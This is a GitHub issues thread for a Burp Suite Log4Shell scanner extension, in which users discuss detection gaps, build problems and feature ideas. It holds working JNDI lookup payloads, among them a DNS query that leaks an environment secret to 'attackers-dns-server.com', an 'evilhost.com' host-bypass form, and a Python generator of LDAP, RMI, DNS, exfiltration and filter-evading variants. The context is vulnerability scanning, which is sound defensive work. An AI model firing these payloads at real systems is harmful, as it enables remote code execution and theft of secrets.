silentsignal / burp-log4shell
Log4Shell scanner for Burp Suite
License: GNU General Public License v3.0
Hi,
Any reason why the Log4Shell scanner is removed from the bApps extensions?
Hi folks,
while the method you described to only scan for log4j is viable, there is an easier way to do it in Burp: adding a context menu option. It should go something like:
from javax.swing import JMenuItem
from burp import IContextMenuFactory  # BurpExtender must also inherit this
# in registerExtenderCallbacks: keep the callbacks and register this object as a menu factory
self._callbacks = callbacks
callbacks.registerContextMenuFactory(self)
# IContextMenuFactory.createMenuItems: called on right-click; Burp adds the items we return
def createMenuItems(self, invocation):
    scanMenu = JMenuItem("Log4j scan")
    scanMenu.addActionListener(startScan(self, invocation))
    return [scanMenu]
where startScan is something like:
from java.awt.event import ActionListener
class startScan(ActionListener):
    def __init__(self, extender, invocation):
        self._extender = extender
        self._invocation = invocation
    def actionPerformed(self, e):
        # queue an active scan of each selected request using the IBurpExtenderCallbacks
        # saved in registerExtenderCallbacks; signature is doActiveScan(host, port, useHttps, request)
        for msg in self._invocation.getSelectedMessages():
            svc = msg.getHttpService()
            self._extender._callbacks.doActiveScan(svc.getHost(), svc.getPort(),
                                                   svc.getProtocol() == "https", msg.getRequest())
I know this is in Python but you get the idea; there are many extensions that hook into registerContextMenuFactory, so you can just copy from there. Let me know if I can help, cheers :)
Fisher
I wonder if it would make sense to generate a low-confidence issue if the answer takes >29 s to arrive (I've read that Java times out after 31 s and Burp drops the connection at 30 s, IIRC), as this can indicate that someone is trying to resolve our JNDI host on the backend?
Hi! I've just installed Burp Pro out of the box and the only extension I have added is yours. Unfortunately I am not able to discover any trails of Log4Shell, even though I have identified a few that should be reported based on release notes etc. Are there any extra plugins/settings that should be enabled/installed to make it scan successfully? Also, should the scan be started from the "/" URL of the target?
Thanks !
Describe the bug
Even with LDAP to a remote host being stopped by using a modern Java version, there are still more ways to exploit the CVE.
But (based on looking at the source) this scan only checks the LDAP exploit path.
So a clean sheet from this scan doesn't mean that you're not vulnerable.
Example of a non-LDAP attack:
${jndi:dns://attackers-dns-server.com/somedomain${env:SECRET_TO_LEAK_VIA_DNS_QUERY}}
or via Factory Gadget attacks
See Appendix B of https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/
Sanity Check
Using the docker image at https://github.com/christophetd/log4shell-vulnerable-app, this plugin fails to detect any issues. I've tried the prebuilt jar, and even tried building myself. Same results.
Hello,
It's been a while since I've executed .jar files; I was under the impression that the command is java -jar, yet I get the following:
java -jar burp-log4shell.jar
no main manifest attribute, in burp-log4shell.jar
Environment:
java --version
openjdk 11.0.13 2021-10-19
OpenJDK Runtime Environment 18.9 (build 11.0.13+8)
OpenJDK 64-Bit Server VM 18.9 (build 11.0.13+8, mixed mode)
In my internal environment testing we've found some hosts/products that have been vulnerable to the Log4j vulnerability, but where it would only fire if the URI path was NOT URL-encoded. These hosts are not showing any vulnerable parameters when scanned using the plugin, but will fire if I take the payload, decode it, and replay it in Repeater. When we checked the logs generated, we found that it is logging the raw URI, and this was causing the payload to not be interpreted by the vulnerable class. On these hosts, only the URI was vulnerable, so the other non-encoded positions such as User-Agent were not being processed.
Thanks for putting this out, BTW!
Hi,
Could you please confirm whether the Log4Shell Scanner Burp Suite Pro add-on is capable of identifying the log4j vulnerabilities CVE-2021-44832, CVE-2021-45105 and CVE-2021-45046.
Thanks
Saleem Choudary
This will require improved payloads:
https://twitter.com/marcioalm/status/1471740771581652995
Example from the tweet:
${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
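The two comments above (the non-LDAP report with its DNS exfiltration payload, and the "improved payloads" note with the 127.0.0.1#host form) both come down to generating more than one lookup variant and then being able to attribute whatever callback arrives. The Python below is an added example and not the extension's own code: it emits labelled variants (LDAP, RMI, DNS, the nested ${env:...} DNS exfiltration form, the 127.0.0.1#host form from the tweet, and a ${lower:j} obfuscated form that defeats naive matching on the literal "${jndi:"), puts a per-injection-point tag in both the hostname and the path so that a DNS-only resolution and a full LDAP connection can each be traced back to the request position that triggered it, and correlates listener log lines against that map. CALLBACK_HOST, LDAP_PORT, the log format and the sample lines are assumptions constructed for the example.

```python
"""Added example (not the scanner's own code): labelled Log4Shell payload
variants plus correlation of listener log lines back to injection points.

Assumptions: CALLBACK_HOST is a DNS/LDAP listener domain you control, LDAP_PORT
is where your LDAP listener sits, and the log lines and tag-to-position map
below are constructed for the example rather than captured from a target.
"""
import re
import uuid

CALLBACK_HOST = "callback.example"   # assumption: your own listener domain
LDAP_PORT = 1389                     # assumption: your LDAP listener port

TAG_RE = re.compile(r"\b([0-9a-f]{12})\b")


def new_tag():
    """Random 12-hex-character tag; use a fresh one per injection point."""
    return uuid.uuid4().hex[:12]


def make_payloads(tag, callback_host=CALLBACK_HOST, ldap_port=LDAP_PORT):
    """Return JNDI lookup strings keyed by variant.

    The tag goes into both the hostname (seen by DNS even when egress to the
    LDAP port is blocked) and the path (seen by the listener on a full
    connection), so either kind of callback can be attributed.
    """
    host = "%s.%s" % (tag, callback_host)
    return {
        # classic LDAP check
        "ldap": "${jndi:ldap://%s:%d/%s}" % (host, ldap_port, tag),
        # RMI and DNS providers for targets where the LDAP path is blocked
        "rmi": "${jndi:rmi://%s:%d/%s}" % (host, ldap_port, tag),
        "dns": "${jndi:dns://%s/%s}" % (host, tag),
        # nested ${env:...} lookup leaks a variable in the queried name (the
        # report's DNS exfiltration form; HOSTNAME chosen as a harmless example)
        "dns-env": "${jndi:dns://%s/%s.${env:HOSTNAME}}" % (callback_host, tag),
        # 127.0.0.1#host form from the linked tweet
        "ldap-hostbypass": "${jndi:ldap://127.0.0.1#%s:%d/%s}" % (host, ldap_port, tag),
        # nested ${lower:j} defeats naive matching on the literal "${jndi:"
        "lower-obfuscated": "${${lower:j}ndi:ldap://%s:%d/%s}" % (host, ldap_port, tag),
    }


def correlate(log_lines, tag_to_position):
    """Map each listener log line carrying a known tag to its injection point."""
    hits = {}
    for line in log_lines:
        for tag in TAG_RE.findall(line):
            if tag in tag_to_position:
                hits.setdefault(tag_to_position[tag], []).append(line)
    return hits


def leaked_value(line, tag, callback_host=CALLBACK_HOST):
    """For a 'dns-env' callback, return the text queried after '<tag>.'; None otherwise."""
    m = re.search(re.escape(tag) + r"\.([^\s/]+)", line)
    if not m or m.group(1) == callback_host:
        return None
    return m.group(1)


# Constructed listener log lines (not real captures): the tag injected in
# User-Agent produced a DNS resolution and then an LDAP search; the tag injected
# in X-Api-Version produced only a DNS query carrying the leaked HOSTNAME.
SAMPLE_TAGS = {"3f2a9c1d8b7e": "User-Agent", "9b1e4d7c2a05": "X-Api-Version"}
SAMPLE_LOG = [
    "10:00:01 DNS A 3f2a9c1d8b7e.callback.example from 203.0.113.5",
    "10:00:01 LDAP search base=3f2a9c1d8b7e from 203.0.113.5",
    "10:00:04 DNS A 9b1e4d7c2a05.app-server-01 from 203.0.113.5",
    "10:00:09 DNS A www.callback.example from 198.51.100.7",
]

if __name__ == "__main__":
    for variant, payload in make_payloads(new_tag()).items():
        print("%-16s %s" % (variant, payload))
    for position, lines in correlate(SAMPLE_LOG, SAMPLE_TAGS).items():
        print(position, "->", len(lines), "callback(s)")
    print("leaked:", leaked_value(SAMPLE_LOG[2], "9b1e4d7c2a05"))
```

A DNS hit with no following LDAP search (the X-Api-Version case in the sample) is the "lookup attempted but connection blocked" situation the non-LDAP report describes: it is still evidence that the lookup string was evaluated, which is why the tag has to live in the hostname and not only in the path.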
Hi,
To be able to build this I have to change the protobuf version in build.gradle to be:
classpath "gradle.plugin.com.google.protobuf:protobuf-gradle-plugin:0.8.18"
Hi! I think that the hard way can be simplified in this way:
Extension generated issue
I suggest this plugin could add some scan rules.
For example, it could also put the payload in the 'Accept' header of the request.